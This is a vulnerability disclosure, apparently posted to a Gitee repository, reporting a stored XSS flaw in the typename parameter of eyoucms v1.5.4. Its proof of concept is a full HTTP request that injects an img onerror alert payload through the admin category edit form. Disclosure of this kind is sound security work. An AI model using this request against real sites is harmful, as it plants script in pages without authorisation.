1 Star 0 Fork 0

wkstestete / cve

加入 Gitee
与超过 1000 万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
该仓库未声明开源许可证文件(LICENSE),使用请关注具体项目描述及其代码上游依赖。
克隆/下载
eyoucms xss.md 1.34 KB
一键复制 编辑 Web IDE 原始数据 按行查看 历史
wkstestete 提交于 2023-03-21 07:23 . update xss/eyoucms xss.md.

eyoucms v1.5.4 typename parameter has a stored XSS vulnerability

POC

Host: www.eyou.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
Origin: http://www.eyou.com
Connection: close
Referer: http://www.eyou.com/login.php?m=admin&c=Arctype&a=edit&id=68&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=kc2ot9hcf8c1685heb8bt7k1n0; users_id=1; workspaceParam=index%7CArctype
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1```

typename=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&dirname=imgsrc1onerroralert1&current_channel=1&parent_id=0&channeltype=1&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=&litpic_local=&litpic_remote=&templist=lists_article.htm&tempview=view_article.htm&seo_title=&seo_keywords=&seo_description=&tab=1&id=68&grade=0&oldgrade=0

The payload is stored in the database, so it is stored XSS

输入图片说明

1
https://gitee.com/wkstestete/cve.git
git@gitee.com:wkstestete/cve.git
wkstestete
cve
cve
master

搜索帮助